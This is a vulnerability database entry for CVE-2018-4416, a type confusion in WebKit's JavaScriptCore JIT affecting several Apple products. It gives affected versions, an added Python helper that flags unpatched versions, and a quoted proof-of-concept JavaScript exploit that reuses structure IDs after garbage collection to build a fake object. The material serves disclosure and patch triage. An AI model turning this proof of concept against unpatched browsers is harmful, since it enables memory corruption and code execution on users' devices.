WebKit security vulnerability in multiple Apple products

Vulnerability ID: 1377122
Vulnerability type: Buffer error (CNNVD classification; the report below describes the root cause as a type confusion)
Published: 2018-12-03
Updated: 2019-04-09
CVE: CVE-2018-4416
CNNVD ID: CNNVD-201810-1518
Platform: N/A
CVSS score: N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018120014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1518
|Vulnerability details
Apple iOS and the other products listed here are made by Apple Inc. of the United States. Apple iOS is an operating system developed for mobile devices. WebKit is the web browser engine component used in these products. tvOS is an operating system for smart TVs. Safari is a web browser and the default browser shipped with Mac OS X and iOS. The WebKit component in multiple Apple products contains a security vulnerability. An attacker can exploit it through specially crafted malicious web content to execute arbitrary code (memory corruption; the report below identifies the underlying bug as a type confusion in the JavaScriptCore JIT). The following products and versions are affected: Apple iOS before 12.1; tvOS before 12.1; watchOS before 5.1; iCloud for Windows before 7.8; iTunes before 12.9.1; Safari before 12.0.1.
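Triage helper, added here as an example and not part of the CNNVD or cxsecurity entry: it decides whether a reported product version predates the fix, using the "before X" versions listed in the description above. Product names used as keys, and the assumption that the listed version is the first fixed release, are this example's own; versions are compared as integer tuples rather than strings so that, for instance, iTunes 12.9.1 is correctly ranked below a hypothetical 12.10.

```python
from typing import Dict, Tuple

# First fixed release per product, taken from the advisory text above.
# The product-name keys are this example's own naming convention.
FIXED_IN: Dict[str, str] = {
    "iOS": "12.1",
    "tvOS": "12.1",
    "watchOS": "5.1",
    "iCloud for Windows": "7.8",
    "iTunes": "12.9.1",
    "Safari": "12.0.1",
}


def parse_version(s: str) -> Tuple[int, ...]:
    """Turn '12.0.1' into (12, 0, 1); reject anything that is not dotted digits."""
    parts = s.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {s!r}")
    return tuple(int(p) for p in parts)


def _pad(a: Tuple[int, ...], b: Tuple[int, ...]) -> Tuple[Tuple[int, ...], Tuple[int, ...]]:
    """Right-pad with zeros so (12, 1) compares equal to (12, 1, 0)."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def is_vulnerable(product: str, version: str) -> bool:
    """True when `version` of `product` is older than the first fixed release."""
    if product not in FIXED_IN:
        raise KeyError(f"no fix data for {product!r}")
    have, fixed = _pad(parse_version(version), parse_version(FIXED_IN[product]))
    return have < fixed


if __name__ == "__main__":
    # Constructed sample inventory, not real telemetry.
    inventory = [("Safari", "12.0"), ("Safari", "12.0.1"),
                 ("iTunes", "12.9"), ("iOS", "11.4.1"), ("iOS", "12.1")]
    for product, version in inventory:
        state = "VULNERABLE" if is_vulnerable(product, version) else "patched"
        print(f"{product} {version}: {state}")
```

Plain string comparison would get the iTunes case wrong ("12.9.1" sorts after "12.10" lexically), which is the usual mistake in ad hoc version checks; the tuple comparison and the zero padding in `_pad` avoid both that and the shorter-tuple-is-smaller pitfall.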
|Vulnerability EXP
WebKit: JSC: JIT: A bug with JSPropertyNameEnumerator

CVE-2018-4416

When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store information about the input object of the for-in loop. Inside the loop, the structure ID of the "this" object of every get_by_id expression that uses the loop variable as the index is compared against the structure ID cached in the JSPropertyNameEnumerator object. If they are the same, the "this" object of the get_by_id expression is considered to have the same structure as the input object of the for-in loop.

The problem is that nothing prevents the structure whose ID was cached from being freed. Since structure IDs can be reused after their owners are freed, this can lead to type confusion.

PoC:
function gc() {
    // Allocate a few large ArrayBuffers to pressure the collector so that
    // unreferenced Structures are freed and their IDs become reusable.
    for (let i = 0; i < 10; i++) {
        let ab = new ArrayBuffer(1024 * 1024 * 10);
    }
}

function opt(obj) {
    // Starting the optimization.
    for (let i = 0; i < 500; i++) {

    }

    let tmp = {a: 1};

    gc();
    tmp.__proto__ = {};  // "tmp" transitions to a fresh Structure.

    for (let k in tmp) {  // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator.
        tmp.__proto__ = {};  // "tmp" leaves the cached Structure, which now has no owner.

        gc();  // The cached Structure is freed here; its ID can be handed out again.

        obj.__proto__ = {};  // The structure ID of "obj" now equals tmp's cached one.

        return obj[k];  // Type confusion: obj is read as if it had tmp's old structure.
    }
}

opt({});  // Warm-up call with an ordinary object.

// A typed array is passed as "obj". The confused property read returns one of
// its internal fields as a JSValue, so the array's storage ends up being
// treated as a fake object whose first word (0x1234) sits where a structure ID
// would be (hence the variable name).
let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 0x1234;

let fake_object = opt(fake_object_memory);
print(fake_object);  // print() is the jsc shell builtin.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: lokihardt

|References

Source: securitytracker.com

Link: https://securitytracker.com/id/1042003